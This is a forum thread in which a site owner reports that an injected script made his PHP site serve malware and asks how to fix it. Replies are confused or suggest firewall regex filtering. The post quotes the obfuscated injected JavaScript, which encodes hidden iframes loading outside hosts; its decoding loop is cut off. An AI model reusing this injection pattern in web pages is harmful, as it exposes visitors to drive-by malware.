site hacked by innjecting script

[blueguitar]

My site indiantaxsolutions.com has been hacked recently by injecting the following script . This script starts downloading malware,badware as soon as the page is resolved in the browser . Hosting guys say they cannt do any thing about it and requested upgrade script .
site was built using PHP 4 . Google has block the site following this attack . I have removed script all those files and uploaded the clean ones but site is still vulnerable to such .

Some body may please let me know the solutions.

<script>var source ="=jgsbnf!tsd>#iuuq;00tfpusbgg/jogp0dpvoufs0jgsbnf/qiq#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?=jgsbnf!tsd>#iuuq;00pqfsbujwf/dd0hpphmf0jgsbnf/qiq#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = "";

for(var i=0;i </script>

 

[maczen]

Poor guy posted this to three forums and never received an actual response.. looks encrypted (makes no sense) or like rubbish to me.. Unless the actual script places this on the pages as an (I was here) type of thing.. or to make the real script less noticeable..

Anyone?

B Haines
CCNA R&S, ETA FOI

 

[Cluebird]

If you have ASA with 7.2 or above code you can do a deep http inspection with custom signatures using regular expressions for the specific script and drop that traffic.